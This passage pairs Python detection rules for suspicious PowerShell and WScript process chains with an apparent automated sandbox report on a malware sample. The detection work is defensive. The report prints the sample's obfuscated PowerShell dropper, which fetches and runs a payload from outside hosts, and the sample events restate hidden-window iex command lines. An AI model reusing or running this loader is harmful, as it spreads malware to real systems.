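_EXEC_POLICY = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:unrestricted|bypass)", re.I)
_HIDDEN = re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.I)
_IEX = re.compile(r"\biex\b|invoke-expression", re.I)


def _image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def script_host_from_suspicious_folder(ev: Event) -> bool:
    """WScript/CScript running a script that lives in a world-writable folder."""
    cl = ev["CommandLine"].lower()
    return _image_name(ev["Image"]) in SCRIPT_HOSTS and any(d in cl for d in SUSPICIOUS_SCRIPT_DIRS)


def script_host_spawns_powershell(ev: Event) -> bool:
    return _image_name(ev["ParentImage"]) in SCRIPT_HOSTS and _image_name(ev["Image"]) == "powershell.exe"


def oversized_powershell_cmdline(ev: Event) -> bool:
    return _image_name(ev["Image"]) == "powershell.exe" and len(ev["CommandLine"]) >= LONG_CMDLINE


def insecure_execution_policy(ev: Event) -> bool:
    return _image_name(ev["Image"]) == "powershell.exe" and bool(_EXEC_POLICY.search(ev["CommandLine"]))


def hidden_window_with_iex(ev: Event) -> bool:
    cl = ev["CommandLine"]
    return (_image_name(ev["Image"]) == "powershell.exe"
            and bool(_HIDDEN.search(cl)) and bool(_IEX.search(cl)))


RULES: Dict[str, Callable[[Event], bool]] = {
    "script_host_from_suspicious_folder": script_host_from_suspicious_folder,
    "script_host_spawns_powershell": script_host_spawns_powershell,
    "oversized_powershell_cmdline": oversized_powershell_cmdline,
    "insecure_execution_policy": insecure_execution_policy,
    "hidden_window_with_iex": hidden_window_with_iex,
}


def triage(events: List[Event]) -> Dict[int, List[str]]:
    """Map each event index to the rule names it matched; unmatched events are omitted."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        matched = [name for name, rule in RULES.items() if rule(ev)]
        if matched:
            hits[i] = matched
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSH = r"C:\Windows\System32\wscript.exe"
# Constructed events mirroring the report's tree, plus one benign admin session at the end.
SAMPLE_EVENTS: List[Event] = [
    {"Image": PS, "ParentImage": "unknown",   # how the sandbox launches a .ps1 sample
     "CommandLine": '"' + PS + '" -noLogo -ExecutionPolicy unrestricted -file "C:\\Users\\user\\Desktop\\cu.ps1"'},
    {"Image": PS, "ParentImage": PS,
     "CommandLine": '"' + PS + '" -win hidden =iex "[Environment]::GetEnvironmentVariable(\'public\') + \'\\\\ik473a.vbs\'"'},
    {"Image": WSH, "ParentImage": PS,
     "CommandLine": '"C:\\Windows\\System32\\WScript.exe" "C:\\Users\\Public\\tq5.vbs"'},
    {"Image": PS, "ParentImage": WSH,          # stand-in for the 8173-byte obfuscated line
     "CommandLine": '"' + PS + '" "cls;write \'' + "Anetholes Klosetternes " * 360 + "'\""},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": PS,
     "CommandLine": '"C:\\Windows\\system32\\cmd.exe" /c "echo %appdata%\\Succesfulde.blo && echo t"'},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"' + PS + '" -NoProfile -Command Get-Service'},
]

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(idx, _image_name(SAMPLE_EVENTS[idx]["Image"]), names)
```

Each rule on its own is noisy (an admin with `-ep bypass` in a scheduled task, a long but legitimate build script); the value is in the parent-child pairing, so in production correlate the hits through ProcessGuid/ParentProcessGuid and alert on two or more rules firing within one lineage, as they do for events 1 through 3 here.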
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: System.Management.Automation.pdb_ source: powershell.exe, 00000003.00000002.1554617977.000002A67CA47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553526249.000002A67C920000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb]Y source: powershell.exe, 00000003.00000002.1552369513.000002A67C75B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kore.pdb5 source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Htem.pdb% source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb 024 source: powershell.exe, 00000000.00000002.1735847498.0000022A2ACA6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb'N source: powershell.exe, 00000003.00000002.1554888189.000002A67CA85000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.pdb! source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb- source: powershell.exe, 00000007.00000002.2752630395.0000022536E27000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000007.00000002.2755751802.0000022537072000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbon.resourcesy source: powershell.exe, 00000000.00000002.1735847498.0000022A2AC61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370AB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdb source: powershell.exe, 00000003.00000002.1554151718.000002A67C9DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2755751802.00000225370C4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF887C11B09 push es; iretd 0_2_00007FF887C11B0A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF887CE7613 push edi; ret 0_2_00007FF887CE7616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF887C11B7A push F887CF02h; iretd 3_2_00007FF887C11BB2
